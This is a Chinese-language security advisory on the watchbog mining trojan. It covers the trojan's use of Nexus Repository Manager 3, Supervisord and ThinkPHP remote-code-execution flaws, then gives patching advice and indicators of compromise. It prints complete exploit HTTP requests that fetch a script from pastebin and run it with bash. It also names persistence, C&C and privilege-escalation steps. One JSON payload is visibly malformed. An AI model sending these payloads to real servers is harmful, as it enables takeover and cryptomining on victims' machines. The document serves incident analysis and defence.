Nexus Repository Manager 3漏洞分析与防御指南

漏洞概述

近期发现watchbog挖矿木马利用Nexus Repository Manager 3的远程代码执行漏洞(CVE-2019-7238)进行攻击。该漏洞于2019年2月5日由Sonatype公司披露，仅半个月后(2月24日)就被黑产利用进行挖矿攻击，显示了漏洞从曝光到被利用的时间窗口正在急剧缩短。

攻击向量分析

攻击者主要通过以下三种漏洞进行攻击：

1. Nexus Repository Manager 3远程代码执行漏洞(CVE-2019-7238)

攻击载荷：

POST /service/extdirect HTTP/1.1
Host: [victim_ip]:8081
X-Requested-With: XMLHttpRequest
Content-Type: application/json

{"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value"property": "expression", "value": "233.class.forName('java.lang.Runtime').getRuntime().exec('curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby')"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}

2. Supervisord远程命令执行漏洞(CVE-2017-11610)

攻击载荷：

POST /RPC2 HTTP/1.1
Host: [victim_ip]:9001
Content-Type: application/x-www-form-urlencoded

<?xml version=\"1.0\"?>\u0002<methodCall>\u0002<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\u0002<params>\u0002<param>\u0002<string>curl https://pastebin.com/raw/zXcDajSs -o /tmp/baby</string>\u0002</param>\u0002</params>\u0002</methodCall>

3. ThinkPHP远程命令执行漏洞

攻击载荷：

POST /index.php?s=captcha HTTP/1.1
Host: [victim_host]
Content-Type: application/x-www-form-urlencoded

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby

所有攻击最终都会执行相同的恶意命令：

curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby

木马功能分析

下载的shell脚本包含多个功能模块：

1. 挖矿模块

• download()函数：下载xmrig改写的挖矿程序
  • 保存路径：/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
  • 配置文件来源：https://ptpb.pw/hgZI
• testa()函数：下载xmr-stak挖矿程序

2. 持久化模块

将恶意命令写入多个文件：

• /etc/cron.d/root
• 其他cron相关文件

3. C&C控制模块

• dragon()函数：请求多个pastebin地址并执行返回的命令
• flyaway()函数：
  • 下载提权程序：https://pixeldra.in/api/download/8iFEEg → /tmp/elavate
  • 利用Ubuntu本地提权漏洞(CVE-2017-16995)
  • 以root权限执行从https://pastebin.com/raw/aGTSGJJp获取的命令

安全建议

1. 漏洞修复

• Nexus Repository Manager 3：立即升级到修复版本
  • 参考：Sonatype官方公告
• Supervisord：修复CVE-2017-11610漏洞
• ThinkPHP：升级到最新安全版本

2. 防护措施

• 使用下一代云防火墙产品：

  • 阻断恶意外联
  • 配置智能策略防御入侵
  • 屏蔽恶意域名(pastebin.com、thrysi.com等)

• 安全加固：

  • 限制不必要的网络访问
  • 监控异常进程和网络连接
  • 定期检查cron任务和启动项

3. 高级防护

• 考虑使用安全管家服务：
  • 安全专家咨询服务
  • 定制化安全方案
  • 入侵后清理和事件溯源支持

IOC(入侵指标)

矿池信息

• 地址：pool.minexmr.com:443
• 钱包地址：44gaihcvA4DHwaWoKgVWyuKXNpuY2fAkKbByPCASosAw6XcrVtQ4VwdHMzoptXVHJwEErbds66L9iWN6dRPNZJCqDhqni3B

恶意URL

• https://pastebin.com/raw/zXcDajSs
• https://ptpb.pw/D8r9
• https://ptpb.pw/hgZI
• https://pastebin.com/raw/05p0fTYd
• https://pixeldra.in/api/download/8iFEEg
• https://pastebin.com/raw/aGTSGJJp

参考资源

• Sonatype官方漏洞公告
• Linux加固参考